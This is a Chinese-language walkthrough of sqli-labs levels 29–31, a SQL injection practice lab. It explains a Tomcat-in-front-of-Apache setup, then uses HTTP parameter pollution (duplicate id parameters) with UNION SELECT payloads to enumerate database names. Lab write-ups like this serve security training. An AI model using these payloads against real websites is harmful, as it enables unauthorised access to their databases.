Less_29
Less-29:
需要用到jspstudy跟phpstudy
搭建jspstudy:
sqli-labs-master文件夹下面还有tomcat文件,这才是真正的关卡,里面的jspstudy需要搭建环境jspstudy
百度搜索PHPstudy,下载jspstudy,进行安装(安装路径不能有中文),
安装成功后,打开站点域名管理;
点击新增,修改网站目录,网站端口;
打开index.jsp文件,修改url(修改为自己的);
Jspstudy搭建完成!
补充知识:服务器两层架构
index.jsp?id=1&id=2请求,服务器配置情况,客户端请求首先过tomcat,tomcat解析第一个参数,接下来tomcat去请求apache(php)服务器,apache解析最后一个参数。那最终返回客户端的应该是id=2的参数。
即jsp/tomcat使用getParameter("id")获取到的是第一个值,php/apache使用$_GET["id"]获取的是第二个值,那么第一个id纯数字,第二个id的值
打开第29关:
输入?Id=1 由图可知,less29使用‘’包裹;
输入:?id=1'&id=3' order by 3--+ 说明数据有三列,而且第一个id值无法注入;
输入 ?id=1&id=-3' union select 1,2,3--+ 得到回显位置;
输入 ?id=1&id=-3' union select 1,2,group_concat(schema_name) from information_schema.schemata--+ 得到数据库的名字;
接下来就是常规操作,和less1基本一致。
Less_30
首先修改第30关url(该为自己的)
Less30使用“”包裹
输入:?id=1&id=1" --+ 回显正常;
输入 ?id=1&id=1" order by 3--+ 回显正常,说明有三列;
输入 ?id=1&id=-1" union select 1,2,3--+ 查看回显位置;
输入?id=1&id=-1" order by 4--+ 显示异常,且没有出现报错信息,说明此关无法按使用报错注入;
接下来就是常规操作,和less1基本一致。
Less_31
首先修改31关的url;
Less31使用”)包裹 其他与第29关一致
输入 ?id=1&id=1") 回显异常,报错;
输入 ?id=1&id=1") --+ 回显正常;
接下来就是常规操作,和less29基本一致。